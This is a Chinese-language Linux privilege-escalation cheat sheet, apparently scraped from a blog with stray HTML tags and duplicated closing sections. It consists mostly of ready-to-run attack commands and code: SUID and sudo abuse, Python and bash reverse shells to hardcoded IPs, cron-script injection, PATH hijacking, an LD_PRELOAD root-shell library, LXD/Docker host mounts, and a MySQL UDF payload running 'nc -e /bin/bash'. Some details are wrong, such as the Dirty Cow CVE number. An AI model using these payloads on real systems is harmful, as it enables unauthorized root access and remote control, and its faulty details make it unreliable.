Linux权限提升全面指南<\/h1>

一、基础准备<\/h2>

1. 基础命令<\/h3>

# 开启shell交互式<\/span>
<\/span><\/span>python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span>
<\/span><\/span># python开启http服务<\/span>
<\/span><\/span>python3 -m http.server 8080<\/span>
<\/span><\/span><\/code><\/pre>2. 系统信息收集<\/h3>
# 操作系统信息<\/span>
<\/span><\/span>hostnamectl
<\/span><\/span>cat \/etc\/*-release
<\/span><\/span>lsb_release -a
<\/span><\/span>cat \/etc\/lsb-release  # Debian<\/span>
<\/span><\/span>cat \/etc\/redhat-release  # RedHat<\/span>
<\/span><\/span>cat \/etc\/centos-release  # CentOS<\/span>
<\/span><\/span>cat \/etc\/os-release  # Ubuntu<\/span>
<\/span><\/span>cat \/etc\/issue
<\/span><\/span>
<\/span><\/span># 内核版本<\/span>
<\/span><\/span>hostnamectl
<\/span><\/span>uname -a
<\/span><\/span>cat \/proc\/version
<\/span><\/span><\/code><\/pre>二、内核溢出提权<\/h2>
1. 漏洞检测工具<\/h3>


MSF检测(效果一般):<\/p>
use post\/multi\/recon\/local_exploit_suggester
<\/span><\/span><\/code><\/pre><\/li>

推荐提权脚本:<\/p>

https:\/\/github.com\/liamg\/traitor<\/li>
https:\/\/github.com\/The-Z-labs\/linux-exploit-suggester<\/li>
https:\/\/github.com\/jondonas\/linux-exploit-suggester-2<\/li>
https:\/\/github.com\/belane\/linux-soft-exploit-suggester<\/li>
<\/ul>
<\/li>
<\/ul>
2. 综合利用脚本<\/h3>

https:\/\/github.com\/carlospolop\/PEASS-ng<\/li>
https:\/\/github.com\/diego-treitos\/linux-smart-enumeration<\/li>
https:\/\/github.com\/redcode-labs\/Bashark<\/li>
https:\/\/github.com\/rebootuser\/LinEnum<\/li>
<\/ul>
3. 常见内核漏洞案例<\/h3>

Dirty Cow (CVE-2016-5159)<\/li>
Pwnkit (CVE-2021-4034)<\/li>
Dirty Pipe (CVE-2022-0847)<\/li>
大脏牛 (CVE-2017-1000405)<\/li>
CVE-2017-16995<\/li>
CVE-2021-3560<\/li>
CVE-2023-1829<\/li>
CVE-2022-2588<\/li>
CVE-2021-3493<\/li>
CVE-2022-32250<\/li>
CVE-2023-3269<\/li>
CVE-2022-0995<\/li>
CVE-2022-2639<\/li>
CVE-2023-0386<\/li>
<\/ul>
三、SUID & SUDO提权<\/h2>
1. 基本概念<\/h3>

SUID入口点<\/strong>: web → 普通用户 → root用户<\/li>
SUDO入口点<\/strong>: 普通用户 → root用户<\/li>
<\/ul>
2. SUID查找<\/h3>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span>find \/ -perm -g=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>3. SUID利用示例<\/h3>
# find命令提权<\/span>
<\/span><\/span>\/usr\/bin\/find . -exec '\/bin\/sh'<\/span> \;<\/span>
<\/span><\/span>
<\/span><\/span># python有SUID权限时反弹shell<\/span>
<\/span><\/span>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.186.130",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/span>
<\/span><\/span><\/code><\/pre>4. SUDO漏洞利用<\/h3>


CVE-2021-3156<\/strong> (sudo 1.8.2-1.8.31p2, 1.9.0-1.9.5p1)<\/p>
git clone https:\/\/github.com\/blasty\/CVE-2021-3156.git
<\/span><\/span>cd CVE-2021-3156
<\/span><\/span>make
<\/span><\/span>chmod a+x sudo-hax-me-a-sandwish
<\/span><\/span>.\/sudo-hax-me-a-sandwish
<\/span><\/span><\/code><\/pre><\/li>

查看sudo权限:<\/p>
sudo -l
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
四、其他提权方式<\/h2>
1. NFS安全提权<\/h3>
条件<\/strong>: 配合SUID提权<\/p>
# 检查NFS共享<\/span>
<\/span><\/span>showmount -e 192.168.16.104
<\/span><\/span>
<\/span><\/span># 挂载NFS共享<\/span>
<\/span><\/span>mkdir nfs
<\/span><\/span>mount -t nfs 192.168.16.104:\/mnt\/nfs .\/nfs
<\/span><\/span>
<\/span><\/span># 创建SUID文件<\/span>
<\/span><\/span>cp \/usr\/bin\/find xuan
<\/span><\/span>chmod 777<\/span> xuan
<\/span><\/span>chmod +s xuan
<\/span><\/span>
<\/span><\/span># 或者编译提权程序<\/span>
<\/span><\/span>#include<stdlib.h><\/span>
<\/span><\/span>#include<unistd.h><\/span>
<\/span><\/span>int main(){<\/span>
<\/span><\/span>    setuid(<\/span>0)<\/span>;
<\/span><\/span>    system(<\/span>"id"<\/span>)<\/span>;
<\/span><\/span>    system(<\/span>"whoami"<\/span>)<\/span>;
<\/span><\/span>    system(<\/span>"\/bin\/bash"<\/span>)<\/span>;
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. Cron任务提权<\/h3>
原理<\/strong>: 当cron任务以root权限运行，但脚本或可执行文件的权限设置不当<\/p>
# 查看定时任务<\/span>
<\/span><\/span>cat \/etc\/crontab
<\/span><\/span>
<\/span><\/span># 查看定时任务脚本权限<\/span>
<\/span><\/span>ls -lia \/etc\/script\/CleaningScript.sh
<\/span><\/span>
<\/span><\/span># 修改脚本添加反弹shell<\/span>
<\/span><\/span>echo "bash -i >& \/dev\/tcp\/192.168.186.130\/6677 0>&1"<\/span> >> \/etc\/script\/CleaningScript.sh
<\/span><\/span><\/code><\/pre>3. PATH劫持攻击<\/h3>
原理<\/strong>: 修改PATH环境变量，使系统优先执行恶意程序<\/p>
# 在\/tmp下创建恶意curl<\/span>
<\/span><\/span>echo "\/bin\/sh"<\/span> > \/tmp\/curl
<\/span><\/span>chmod 777<\/span> \/tmp\/curl
<\/span><\/span>
<\/span><\/span># 修改PATH<\/span>
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span>
<\/span><\/span># 执行有SUID权限的程序<\/span>
<\/span><\/span>\/opt\/statuscheck
<\/span><\/span><\/code><\/pre>4. Capablility能力提权<\/h3>
原理<\/strong>: Linux将root权限细分为不同能力<\/p>
# 查看能力<\/span>
<\/span><\/span>getcap -r \/ 2>\/dev\/null
<\/span><\/span>
<\/span><\/span># 利用示例(如python有cap_setuid+ep)<\/span>
<\/span><\/span>\/tmp\/php -r "posix_setuid(0); system('\/bin\/sh');"<\/span>
<\/span><\/span><\/code><\/pre>5. LD_Preload加载提权<\/h3>
条件<\/strong>: sudo配置允许LD_PRELOAD<\/p>
\/\/ shell.c
<\/span><\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>void<\/span> _init<\/span>() {
<\/span><\/span>    unsetenv("LD_PRELOAD"<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    system("\/bin\/sh"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre># 编译<\/span>
<\/span><\/span>gcc -fPIC -shared -o shell.so shell.c -nostartfiles
<\/span><\/span>
<\/span><\/span># 利用<\/span>
<\/span><\/span>sudo LD_PRELOAD=<\/span>\/tmp\/shell.so find
<\/span><\/span><\/code><\/pre>五、容器提权<\/h2>
1. LXD提权<\/h3>
条件<\/strong>: 用户属于lxd组<\/p>
# 导入镜像<\/span>
<\/span><\/span>lxc image import .\/alpine-v3.22-x86_64-20250721_1126.tar.gz --alias test
<\/span><\/span>
<\/span><\/span># 创建特权容器<\/span>
<\/span><\/span>lxc init test test -c security.privileged=<\/span>true
<\/span><\/span>
<\/span><\/span># 挂载宿主机根目录<\/span>
<\/span><\/span>lxc config device add test test disk source=<\/span>\/ path=<\/span>\/mnt\/root recursive=<\/span>true
<\/span><\/span>
<\/span><\/span># 启动并进入容器<\/span>
<\/span><\/span>lxc start test
<\/span><\/span>lxc exec test \/bin\/sh
<\/span><\/span>
<\/span><\/span># 访问宿主机文件<\/span>
<\/span><\/span>cd \/mnt\/root\/root
<\/span><\/span>cat flag.txt
<\/span><\/span><\/code><\/pre>2. Docker提权<\/h3>
条件<\/strong>: 用户在docker组<\/p>
# 挂载宿主机根目录<\/span>
<\/span><\/span>docker run -v \/:\/mnt -it alpine
<\/span><\/span>
<\/span><\/span># 在容器中访问宿主机文件<\/span>
<\/span><\/span>cd \/mnt\/root
<\/span><\/span><\/code><\/pre>3. Rbash绕过<\/h3>
限制性bash逃逸方法<\/strong>:<\/p>

使用绝对路径执行命令<\/li>
使用vi\/ed等编辑器逃逸<\/li>
使用scp\/sftp<\/li>
使用git\/ssh等命令<\/li>
<\/ol>
六、数据库提权<\/h2>
1. MySQL UDF提权<\/h3>
# 编译UDF<\/span>
<\/span><\/span>gcc -g -shared -Wl,-soname,1518.so -o udf.so 1518.c -lc
<\/span><\/span>
<\/span><\/span># MySQL操作<\/span>
<\/span><\/span>select<\/span> version()<\/span>;
<\/span><\/span>show variables like '%plugin%'<\/span>;
<\/span><\/span>show variables like '%secure%'<\/span>;
<\/span><\/span>
<\/span><\/span>use mysql;
<\/span><\/span>create table xuan(<\/span>line blob)<\/span>;
<\/span><\/span>insert into xuan values(<\/span>load_file(<\/span>'\/tmp\/udf.so'<\/span>))<\/span>;
<\/span><\/span>select<\/span> * from xuan into dumpfile '\/usr\/lib\/mysql\/plugin\/udf.so'<\/span>;
<\/span><\/span>create function<\/span> do_system returns integer soname 'udf.so'<\/span>;
<\/span><\/span>select<\/span> do_system(<\/span>'nc 192.168.16.109 6666 -e \/bin\/bash'<\/span>)<\/span>;
<\/span><\/span><\/code><\/pre>七、工具资源<\/h2>
1. 提权脚本<\/h3>

traitor<\/a><\/li>
linux-exploit-suggester<\/a><\/li>
PEASS-ng<\/a><\/li>
linux-smart-enumeration<\/a><\/li>
<\/ul>
2. 参考文章<\/h3>

Linux提权基础分享和讨论<\/a><\/li>
rbash逃逸大全<\/a><\/li>
<\/ul>

Linux权限提升全面指南<\/h1>

一、基础准备<\/h2>

二、内核溢出提权<\/h2>

三、SUID & SUDO提权<\/h2>

四、其他提权方式<\/h2>

五、容器提权<\/h2>

六、数据库提权<\/h2>

七、工具资源<\/h2>

1. 提权脚本<\/h3> traitor<\/a><\/li> linux-exploit-suggester<\/a><\/li> PEASS-ng<\/a><\/li> linux-smart-enumeration<\/a><\/li> <\/ul> 2. 参考文章<\/h3> Linux提权基础分享和讨论<\/a><\/li> rbash逃逸大全<\/a><\/li> <\/ul>

2. 参考文章<\/h3> Linux提权基础分享和讨论<\/a><\/li> rbash逃逸大全<\/a><\/li> <\/ul>

1. 提权脚本<\/h3>

traitor<\/a><\/li>
linux-exploit-suggester<\/a><\/li>
PEASS-ng<\/a><\/li>
linux-smart-enumeration<\/a><\/li> <\/ul>
2. 参考文章<\/h3>

Linux提权基础分享和讨论<\/a><\/li>
rbash逃逸大全<\/a><\/li> <\/ul>

2. 参考文章<\/h3>

Linux提权基础分享和讨论<\/a><\/li>
rbash逃逸大全<\/a><\/li> <\/ul>